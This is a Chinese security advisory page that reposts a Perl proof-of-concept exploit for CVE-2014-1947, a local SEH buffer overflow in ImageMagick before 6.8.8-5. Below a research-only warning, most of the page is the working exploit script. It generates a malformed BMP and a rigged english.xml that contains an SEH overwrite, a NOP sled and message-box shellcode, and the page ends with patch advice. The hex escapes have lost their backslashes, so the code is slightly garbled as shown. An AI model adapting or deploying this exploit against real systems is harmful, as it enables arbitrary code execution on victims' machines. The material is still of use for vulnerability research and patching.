链接:http://www.exploit-db.com/exploits/31688/ http://osvdb.org/show/osvdb/103206 *>测试方法: --------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!#!/usr/bin/perl ######################################################################################## # Exploit Title: ImageMagick < 6.8.8-5 - Local Buffer Overflow (SEH) # Date: 2-13-2014 # Exploit Author: Mike Czumak (T_v3rn1x) -- @SecuritySift # Vulnerable Software: ImageMagick (all versions prior to 6.8.8-5) # Software Link: http://ftp.sunet.se/pub/multimedia/graphics/ImageMagick/binaries/ # Version Tested: 6.8.8-4 # Tested On: Windows XP SP3 ######################################################################################## # Credits: # # CVE-2014-1947 published Feb 08 2014 # by Justin Grant # http://www.securityfocus.com/bid/65478/info # ######################################################################################## # Overview: # # I saw the notice for this CVE today but there was no known published expoits so # I figured I"d put together this quick POC. Note, all app modules for the tested # version were compiled with safeSEH so my use of an OS module may require adjustment # of the offsets. There also appears to be several bad chars that fail the sploit. # For this POC I only generate a basic messagebox using FatalAppExit(). It may take # some work to get it to do more. # # How it works: # # This particular BOF takes advantage of insecure handling of the english.xml file # which the app uses to display various error messages. I didn"t spend much time # investigating the app so there may be additional vulnerable locations # # This script generates two files: # 1) a malfored .bmp file that will cause ImageMagick to generate a specific # error when opened (LengthAndFilesizeDoNotMatch), as defined in the # english.xml file # 2) a modified english.xml file that replaces the original error message with # our exploit code # # To test this POC: # 1) run the script, replace the original english.xml file (in App"s folder) # 2) open the .bmp file with ImageMagick ######################################################################################### file write function sub write_file { my ($file, $buffer) = @_; open(FILE, ">$file"); print FILE $buffer; close(FILE); print "Exploit file [" . $file . "] created
"; print "Buffer size: " . length($buffer) . "
"; }# create bmp file header; needs to be a valid header to generate necessary error sub bmp_header { my $header = "x42x4d"; # BM $header = $header . "x46x00x00x00"; # file size (70 bytes) $header = $header . "x00x00x00x00"; # unused $header = $header . "x36x00x00x00"; # bitmap offset $header = $header . "x28x00x00x00"; # header size $header = $header . "x02x00x00x00"; # width $header = $header . "x02x00x00x00"; # height $header = $header . "x01x00"; # num of color planes $header = $header . "x18x00"; # num of bits per pixel $header = $header . "x00x00x00x00"; # compression (none) $header = $header . "x10x00x00x00"; # image size $header = $header . "x13x0bx00x00"; # horizontal resolution (2,835 pixels/meter) $header = $header . "x13x0bx00x00"; # vertical resolution (2,835 pixels/meter) $header = $header . "x00x00x00x00"; # colors in palette $header = $header . "x00x00x00x00"; #important colors return $header; }## Construct the corrupted bmp file which will trigger the vuln my $header = bmp_header(); my $data = "x41" x (5000 - length($header)); # arbitrary file data filler my $buffer = $header.$data; write_file("corrupt.bmp", $buffer);# construct the buffer payload for our xml file my $buffsize = 100000; my $junk = "x41" x 62504; # offset to next seh at 568 my $nseh = "xebx32x90x90"; # overwrite next seh with jmp instruction (20 bytes) my $seh = pack("V", 0x74c82f4f); # : pop ebp pop ebx ret # ASLR: False, Rebase: False, SafeSEH: False, OS: True, C:WINDOWSsystem32OLEACC.dll) my $junk2 = "x41" x 12; # there are at least two possible offsets -- 1 for file-> open and 1 for the open file menubar button my $nops = "x90" x 100;# this is just a POC shellcode that displays a messagebox using the FatalAppExit function my $shell = "xb9x7cxecxa5x7c" . # Unicode String "FailSilently" (address may vary) "x31xc0" . # xor eax, eax "xbbxb2x1bx86x7c" . # kernel32.dll FatalAppExit() "x51" . # push ecx "x50" . # push eax "xffxd3"; # call ebxmy $sploit = $junk.$nseh.$seh.$junk2.$nseh.$seh.$nops.$shell; # assemble the exploit portion of the buffer my $fill = "x43" x ($buffsize - (length($sploit))); # fill remainder of buffer with junk $sploit = $sploit.$fill; # assemble the final buffer# build the malicious xml file my $xml = "<?xml version="1.0" encoding="UTF-8"?><locale name="english"><exception><corrupt><image><warning><message name="LengthAndFilesizeDoNotMatch">"; $xml = $xml . $sploit; $xml = $xml . "</message></warning></image></corrupt></exception></locale>"; my $buffer = $xml; write_file("english.xml", $buffer);建议: -------------------------------------------------------------------------------- 厂商补丁:ImageMagick ----------- 目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:http://www.imagemagick.org/ImageMagick 的详细介绍:请点这里 ImageMagick 的下载地址:请点这里相关阅读:利用ImageMagick绘制三基色原理图 http://www.linuxidc.com/Linux/2012-09/70007.htmLinux下PHP支持ImageMagick和MagicWandForPHP http://www.linuxidc.com/Linux/2011-01/31539.htmLinux下用ImageMagick玩图像魔术 http://www.linuxidc.com/Linux/2010-06/26921.htmLinux下ImageMagick和MagicWand For PHP的安装 http://www.linuxidc.com/Linux/2008-07/14525.htmLinux下ImageMagick和JMagick的安装整理 http://www.linuxidc.com/Linux/2008-09/15649.htmGoogle Chrome 33.0.1750.117之前版本多个安全漏洞利用旧版Android漏洞的E-Z-2-Use攻击代码发布相关资讯 imagemagick
易网时代-编程资源站